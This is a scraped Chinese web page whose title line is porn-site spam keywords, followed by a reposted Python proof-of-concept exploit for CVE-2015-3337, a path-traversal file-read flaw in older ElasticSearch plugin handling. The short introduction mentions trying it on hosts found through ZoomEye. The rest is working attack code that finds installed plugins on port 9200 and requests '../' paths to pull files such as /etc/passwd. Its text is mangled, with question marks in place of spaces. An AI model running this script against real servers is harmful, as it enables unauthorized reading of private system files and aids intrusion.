压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

近期在exploit-db上曝出了ElasticSearch插件功能的目錄遍歷（Path Transversal）引起的本地任意文件讀取漏洞，影響1.4.5和1.5.2之前所有版本。在zoomeye上隨便找了幾個試了下，發(fā)現(xiàn)漏洞的影響面積還挺大的。

漏洞利用（POC）

#!/usr/bin/python
#?Crappy?PoC?for?CVE-2015-3337?-?Reported?by?John?Heasman?of?DocuSign
#?Affects?all?ElasticSearch?versions?prior?to?1.5.2?and?1.4.5
#?Pedro?Andujar?||?twitter:?pandujar?||?email:?@segfault.es?||?@digitalsec.net
#?Tested?on?default?Linux?(.deb)?install?/usr/share/elasticsearch/plugins/
#
#?Source:?https://github.com/pandujar/elasticpwn/
?
import?socket,?sys
?
print?"!dSR?ElasticPwn?-?for?CVE-2015-3337\n"
if?len(sys.argv)?<>?3:
????????print?"Ex:?%s?www.example.com?/etc/passwd"?%?sys.argv[0]
????????sys.exit()
?
port?=?9200?#?Default?ES?http?port
host?=?sys.argv[1]
fpath?=?sys.argv[2]
?
def?grab(plugin):
????????socket.setdefaulttimeout(3)
????????s?=?socket.socket()
????????s.connect((host,port))
????????s.send("GET?/_plugin/%s/../../../../../..%s?HTTP/1.0\n"
????????????"Host:?%s\n\n"?%?(plugin,?fpath,?host))
????????file?=?s.recv(2048)
????????print?"?[*]?Trying?to?retrieve?%s:"?%?fpath
????????if?("HTTP/1.0?200?OK"?in?file):
????????????print?"\n%s"?%?file
????????else:
????????????print?"[-]?File?Not?Found,?No?Access?Rights?or?System?Not?Vulnerable"
?
def?pfind(plugin):
????try:
????????socket.setdefaulttimeout(3)
????????s?=?socket.socket()
????????s.connect((host,port))
????????s.send("GET?/_plugin/%s/?HTTP/1.0\n"
????????????"Host:?%s\n\n"?%?(plugin,?host))
????????file?=?s.recv(16)
????????print?"[*]?Trying?to?find?plugin?%s:"?%?plugin
????????if?("HTTP/1.0?200?OK"?in?file):
????????????print?"[+]?Plugin?found!"
????????????grab(plugin)
????????????sys.exit()
????????else:
????????????print?"[-]??Not?Found?"
????except?Exception,?e:
????????print?"[-]?Error?connecting?to?%s:?%s"?%?(host,?e)
????????sys.exit()
?
#?Include?more?plugin?names?to?check?if?they?are?installed
pluginList?=?['test','kopf',?'HQ',?'marvel',?'bigdesk',?'head']
?
for?plugin?in?pluginList:
????pfind(plugin)